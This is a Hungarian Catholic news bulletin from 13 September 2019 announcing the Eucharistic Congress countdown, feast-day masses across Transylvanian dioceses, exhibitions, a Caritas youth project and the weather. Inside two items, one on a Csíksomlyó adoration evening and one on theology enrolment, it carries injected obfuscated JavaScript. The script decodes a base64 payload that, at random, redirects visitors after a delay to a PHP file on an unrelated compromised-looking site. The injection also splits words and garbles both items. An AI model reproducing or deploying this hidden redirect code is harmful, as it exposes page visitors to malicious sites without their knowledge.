2019. szeptember 13. – Hírek és programajánló

H Í R E K   D É L B E N

NEK 2020
Már csak egy év, és elkezdődik a Nemzetközi Eucharisztikus Kongresszus gazdag programsorozata. Budapesten, a Szent István-bazilika előtt Erdő Péter bíboros harangszó kíséretében indítja el a 365 napos visszaszámlálást ma délután 4 órakor. Ekkor nyílik meg a hivatalos regisztráció. Az eucharisztikus kongresszus nem a szó szoros értelmében vett tudományos tanácskozás, „kongresszus”. Sokkal inkább egy világméretű spirituális rendezvénysorozat, amely során a kenyér és a bor színében velünk maradt Jézus Krisztust ünnepeljük. További információk a iec2020.hu oldalon vagy az esemény facebook oldalán.

Erdélyi Táncháztalálkozó
Az elmúlt évekhez hasonlóan, idén is megrendezésre kerül a három napos program Székelyudvarhelyen. A néptánc előadások mellett, prímás koncert, kirakodóvásár és kézműves foglalkozások is várják az érdeklődőket, és persze nem maradhat el az esti táncház sem. Ma délután fél 6 órától gyülekeznek a táncosok a város három pontjában majd táncos-muzsikás sétával érkeznek a Patkóba. További programok az esemény facebook oldalán olvashatóak.

Szentségimádás Csíksomlyón
Ma este fél 8 órától várnak mindenkit a csíksomlyói kegytemplomba zenés áhítatra az Oltáriszentség előtt. A zenei szolgálatot a Bfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');and'Ora zenekar biztosítja.

Elkezdődött a beiratkozás a teológia karon
Didaktikai teológia szakra iratkozhatnak az érettségi oklevéllel rendelkező tanulni vágyók szeptember 11-18. között Kolozsváron. A Római Katolikus Teológia Kar minden diák számára bentlakást biztosít. Azok a diákok, akik a teológia mellett más szakon is tanulnának, magánösztöndíjat igényelhetnek, ami a másik szak tfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andíját fedezi. Több információ a plébániákon, a 0264590715 telefonszámon, a kar honlapján vagy a facebook oldalán található.

Ima nemzetünk, családjaink egységéért
Holnap Szent Kereszt Felmagasztalásának ünnepén, déli 12 órakor szentmise lesz Hargitafürdőn a relé közelében felállított keresztnél és romoknál. Délelőtt 10 órától lesz a gyülekezés, majd 10.15-kor indulás a Hotel Ózontól. Az út meredeken vezet fel a kereszthez, erre számítva és ehhez alkalmas öltözékben, cipőben érkezzünk!

Ünnepség Újpécsen
A temesvári egyházmegyéhez tartozó Újpécsen 25 évvel ezelőtt, 1994-ben hozta létre az Esseni Egyházmegyei Caritas Szervezet az első családi típusú gyermekotthont. A projekt azóta a temesvári egyházmegyei Caritas szervezet keretében működik, és jelentősen kibővült: a négy házban jelenleg 21 gyermek és fiatal talált szeretetteljes otthonra. A 25 éves jubileumot a közösség holnap ünnepli. Ez alkalomból a szentmisét a helyi templomban 11 órai kezdettel Dirschl Johann általános helynök celebrálja.

Képzőművészeti kiállítás
Az Ars Sacra egyesület és a kolozsvári Szent Mihály templom közös szervezésében kortárs művészek kiállítása lesz látható Kolozsváron a Iuliu Maniu utca 4 szám alatti kiállítóteremben. A kiállítást holnap délután 5 órától Veres Stelián plébános-helyettes nyitja meg, közreműködnek Bodó Márta és Potyó István. A tárlat október 6-ig lesz látogatható.

Nyitott templomok napja
Az Ars Sacra Fesztivál keretén belül a Nyitott Templomok Napján, holnap a székelykeresztúri Szent Kereszt Felmagasztalása templomban délután 5 órától Szilágyi István idegenvezetővel lesz templom látogatás. A gyergyószentmiklósi örmény katolikus templom szintén 5 órától nyitja meg kapuit az érdeklődők előtt. Idegenvezetők Magyari István, Fórika Sebestyén és Gál Hunor plébános. A nagybányai Szentháromság templomban este 7 órától Trifoi Izolda vezetésével várják a látogatókat.

Iránytű a munka világába
A Gyulafehérvári Caritas új projektje a korai iskola elhagyás csökkentését, a munkanélküli fiataloknak a munkapiacon való elhelyezkedését és a külföldre való elvándorlás visszaszorítását célozza meg Maros és Hargita megye településein. A projekt azon – hátrányos helyzetű – fiataloknak nyújt többszintű támogatást, akik kiestek az iskolai rendszerből vagy akiknél fennáll a korai iskolaelhagyás lehetősége, illetve azokat, akik elvégezték a tanulmányaikat, de nem dolgoznak. A projekttel kapcsolatosan érdeklődni lehet Füzi Imolánál a 0744-335272-es telefonszámon, vagy az imola.fuzi@caritas-ab.ro e-mail címen.

Időjárás: A mai napon túlnyomóan napos, száraz, meleg őszi idő ígérkezik, csupán keleten fordul elő kevés csapadék. Az északnyugati szél csak kevés helyen járhat élénk széllökésekkel. A minimumok 4-14 fok között alakulnak. Délután szinte nyárias meleg lesz, 23-29 fokig melegszik az idő.

H Í R E K   R E G G E L

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán a a sztrigyszentgyörgyi templomban tartanak örökös szentségimádási napot. Járuljunk az Oltáriszentségben jelen levő Krisztus elé, fejezzük ki örömünket, hálánkat és imádatunkat.

Szent Kereszt felmagasztalása napi búcsúk
A gyulafehérvári egyházmegyében holnap a csíkszeredai Szent Kereszt templomban két búcsús misét tartanak. Délelőtt fél 11 órakor Csedő István nyugalmazott plébános prédikál, az este 7 órakor kezdődő szentmisén pedig Bátor Botond ezüstmisés pálos atya Hargitafürdőről.
Buzásbesenyőn, a búcsús szentmise holnap délelőtt 11 órakor kezdődik. Az ünnep szónoka: Boga Norbert medgyesi segédlelkész.
A Bucsin-tetőn az ünnepi szentmise szintén holnap délelőtt 11 órakor lesz. A szentbeszédet Biró Károly ditrói segédlelkész mondja.
Székelykeresztúron a búcsús szentmisét holnap ugyancsak délelőtt 11 órakor tartják. A meghívott szónok Antal Zoltán, a gyergyószentmiklósi Szent István plébánia segédlelkésze.
Holnap délelőtt 11 órakor szentmisét mutatnak be Szovátán is a Tyúkász-hegyi kápolnánál.
A brassói Szent Kereszt felmagasztalása templomban a búcsús szentmisét délelőtt fél 12 órakor tartják. Az ünnepi szónok Szász János petrozsényi plébános.
Tordatúron a búcsús szentmise holnap délután 1 órakor kezdődik. A szentmise szónoka László István, a kolozsvári Szent Mihály plébánia segédlelkésze.
Holnap, délután 4 órától kezdődik Válaszúton a búcsús szentmise, melynek főcelebránsa és szónoka Kémenes Lóránt Zoltán, kolozsvári főesperes-plébános.
Nagysármáson holnap délután 6 órakor kezdődik az ünnepi szentmise.
Bonchidán szintén holnap délután 6 órától tartják a templombúcsút. Itt a szentmise szónoka László István kolozsvári segédlelkész.
A csernakeresztúri egyházközségben a búcsús szentmise szeptember 15-én, vasárnap déli 12 órakor lesz. A szentmise szónoka: Tódor Attila, a gyulafehérvári Gróf Majláth Gusztáv Károly Római Katolikus Teológiai Líceum spirituálisa.
A zabolai templomban a búcsús szentmise szintén vasárnap, déli 12 órától kezdődik. Az ünnep meghívott szónoka Kovács József, a kézdivásárhelyi Boldog Özséb plébánia segédlelkésze.
Fancsalban, Székelyszentkirály leányegyházközségében, vasárnap a délután fél 1 órakor kezdődő búcsús szentmisén a szentbeszédet Bálint Emil felcsíki főesperes, a csíkszeredai Szent Ágoston egyházközség plébánosa tartja.
Zeteváralja filiájában, Libánban szeptember 15-én, vasárnap délután 1 órakor lesz a búcsú. A szentmisén Sebestyén Ágoston máréfalvi plébános prédikál.
A borbándi plébániatemplomban vasárnap délután 6 órakor mutatják be a búcsús szentmisét. Az ünnep szónoka: Farkas Ervin, a gyulafehérvári Gróf Majláth Gusztáv Károly Római Katolikus Teológiai Líceum prefektusa.
A temesvári egyházmegyében a kisiratosi közösség holnap tartja a templombúcsút. Az ünnepi szentmisét délelőtt fél 11 órakor Pál József-Csaba megyés püspök mutatja be.
Az óteleki közösség holnap tartja a templombúcsút, az ünnepi szentmisét délelőtt 11 órakor Máthé Lajos újszentesi plébános celebrálja.
Az oraviczabányán is holnap ünneplik a templom búcsúját, a szentmise délután 5 órakor kezdődik. Mrghívott szónok Sima M. Mihai Milan lelkipásztor.
Holnap van a temesvári piarista templom felszentelésének emléknapja. Ez alkalomból a szentmisét délután 6 órai kezdettel Miklós Csaba majláthfalvi plébános mutatja be.
Holnap, Szent Kereszt felmagasztalásának ünnepén tartják a verseci hegyi kápolna búcsúünnepét. A hegyen délelőtt 10 órakor szentmise horvát nyelven és keresztúti ájtatosság magyar nyelven, 11 órakor szentmise magyar nyelven és keresztúti ájtatosság horvát nyelven. A nagytemplomban délután 2 órakor bűnbánati liturgia, 3 órakor szentségimádás, 4 órakor rózsafüzér ájtatosság, 5 órakor pontifikális szentmise, főcelebráns dr. Német László nagybecskereki megyés püspök.
A szatmári egyházmegyében Rónaszéken holnap délelőtt 10 órakor a templomban mondanak imát, onnan indulnak a kápolna felé. A kálvária stációinál keresztúti ájtatosságot tartanak, majd a kápolnához felérve búcsús szentmisét mutatnak be, melyen a szónok Tóth Attila Levente margittai plébános.
Mezőteremen holnap délelőtt 11 órától Kühn Pál tiszteletbeli kanonok a búcsús szentmise szónoka.
Sárközújlakon is holnap délelőtt 11 órakor kezdődik a búcsús szentmise. Itt Buna János Lajos halmi plébános mond szentbeszédet.

Időjárás: A mai napon túlnyomóan napos, száraz, meleg őszi idő ígérkezik, csupán keleten fordul elő kevés csapadék. Az északnyugati szél csak kevés helyen járhat élénk széllökésekkel. A minimumok 4-14 fok között alakulnak. Délután szinte nyárias meleg lesz, 23-29 fokig melegszik az idő.

MRE - Hírszolgálat, 2019. szeptember 13.

About the author

majoros gabriella